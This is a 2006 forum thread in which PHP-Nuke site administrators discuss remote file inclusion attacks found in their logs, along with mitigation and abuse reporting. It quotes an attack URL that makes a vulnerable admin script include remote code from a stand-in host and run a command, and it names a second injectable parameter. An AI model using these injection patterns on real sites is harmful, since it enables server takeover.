| Author |
Message |
guidyy
Worker
Joined: Nov 22, 2004
Posts: 208
Location: Italy
|
 Posted:
Thu May 18, 2006 11:48 pm |
|
I never seen it before
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://attackingsite/cse.gif?&cmd=id
cse.gif of course cse.gif is not a gif..
not sure why they use admin_style.php
edit:
I removed the original link, but 99% it was a zombie. |
Last edited by guidyy on Fri May 19, 2006 4:38 am; edited 1 time in total |
|
 
 |
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Fri May 19, 2006 3:56 am |
|
yes one of the many around.....
but do edit the url a bit,take out the weblink...
you dont wanna give others an idea... |
| |
|
|
|
|
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support
|
| Posted:
Fri May 19, 2006 4:38 am |
|
The use also //modules/My_eGallery/public/displayCategory.php?basepath=
but it´s uninterestingly for me it´s old. |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Mon Jun 19, 2006 12:32 am |
|
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6432
|
| Posted:
Mon Jun 19, 2006 4:39 am |
|
The good news is that since the attackers host these scripts on their sites, you can easily request that their sites be shut down for violating the terms of service / usage. But be careful when requesting this, since the attacking site may have been used unknowingly. But the site needs to secure itself in that case, and a few days is sufficient before requesting that it, too, be shut down. On a recent day, attacks from 10 sites were made on one of my sites. By the next day, 8 of the 10 were shut down.
Find the abuse email for the owner of the server (it's usually not the same as the domain) and send them a copy of your log entry showing that the attack happened. Then all they need to do is very that the file exists on their server... |
_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG |
|
|
|
|
technocrat
Life Cycles Becoming CPU Cycles
Joined: Jul 07, 2005
Posts: 511
|
| Posted:
Tue Jun 20, 2006 12:11 pm |
|
| evaders99 wrote: | | There have been a lot of recent attacks on the Forums/admin files. But I've not confirmed if the latest BBToNukes are vulernable - I just have not been able to duplicate it on my patched systems. |
Its because of $phpbb_root_path = PHPBB_ROOT_PATH; in the pagestart in the patched series.
PS - [ Only registered users can see links on this board! Get registered or login! ] you still have not fixed these  |
_________________
Nuke-Evolution
phpBB-Evolution / phpBB-Evolution Blog |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
